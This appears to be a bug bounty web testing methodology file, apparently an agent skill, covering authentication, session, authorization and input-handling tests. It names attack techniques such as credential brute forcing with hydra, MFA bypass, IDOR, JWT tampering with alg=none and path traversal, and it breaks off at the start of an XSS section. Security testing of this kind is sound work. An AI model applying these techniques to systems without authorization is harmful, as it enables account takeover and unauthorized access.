bounty-weblisted

# Bug bounty web testing methodology Build on top of `bounty-recon` results. Tool-first: use SecLists wordlists (already cloned in this installer) before writing custom payloads. ## 1. Authentication & session | Test | How | | --- | --- | | Default creds | `hydra`, manual common pairs (admin:admin, root:root) | | User enum (different errors) | manual login form probing | | Account takeover via password reset | inspect token entropy, host header injection on reset email | | Session fixation | check if session ID is set before login | | Session predictability | gather 50+ tokens, run statistical analysis | | MFA bypass | response manipulation (401→200), brute the OTP, race the verify endpoint | | Login CSRF | missing CSRF token on /login | | Logout / impersonation flaws | swap session cookies, replay | ## 2. Authorization (highest-paying class) - **IDOR:** swap numeric IDs, UUIDs, encoded IDs. Try both directions: A→B and B→A. - **BFLA:** swap roles. Test admin endpoints as a regular user. - **BOLA (API):** access another user's resource by ID. - **Path traversal in route params:** `/users/../admin/users`. - **JWT scope claims:** modify `role: user` → `role: admin`, re-sign or use alg=none. - **Race conditions on permission grants:** use `turbo-intruder` or parallel curl. Methodology: enumerate all endpoints with low-privilege user, then re-request each with no auth, expired token, and other-user token. Diff responses. ## 3. Input handling ### XSS ```bash # DOM/reflect